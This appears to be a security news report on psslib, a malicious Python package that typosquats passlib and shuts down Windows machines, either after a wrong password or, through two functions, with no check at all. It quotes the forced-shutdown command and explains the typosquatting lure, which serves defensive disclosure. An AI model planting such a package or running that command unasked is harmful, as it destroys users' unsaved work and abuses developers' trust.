
Socket’s Threat Research Team has uncovered a malicious Python package named psslib designed to abruptly shut down Windows systems under the guise of offering password security functionality.
The package—authored by a threat actor using the alias umaraq—is a typosquat of the legitimate passlib library, which is a widely used password hashing toolkit trusted by millions of developers.
“The malicious psslib package exploits this trust by representing itself as a security utility, while containing code that can cause immediate data loss and system disruption,” Socket reported.
The attack begins with a name trick: psslib closely resembles passlib, a similarity likely intended to dupe developers who type quickly or rely on autocomplete. The legitimate passlib library sees over 8.9 million monthly downloads.
“Socket’s AI Scanner flags psslib as malicious due to its destructive system shutdown behavior.”
Once imported and triggered by an incorrect password entry, psslib executes a Windows shutdown command (shutdown /s /t 1), causing the machine to power off within one second.
The package pretends to provide password protection through a function named spc() using easygui.enterbox() for user input. If the user input doesn’t match the preset value, it shuts the system down immediately.
In addition, psslib includes two other functions—src() and error()—that shut down the system without any authentication at all.
These additional vectors ensure that even limited usage of the library could instantly compromise a developer’s machine, especially in environments running with elevated privileges.
Socket noted that this malware specifically targets Windows-based development environments, where shutdown commands are effective and frequently overlooked. While the payload fails harmlessly on Linux or macOS due to OS command differences, the package’s Windows-specific nature demonstrates targeted intent.
“The attack is fully effective. The shutdown command executes as intended, forcing an immediate system shutdown that can result in: loss of unsaved work and data, corruption of open files and databases, and disruption of running services.”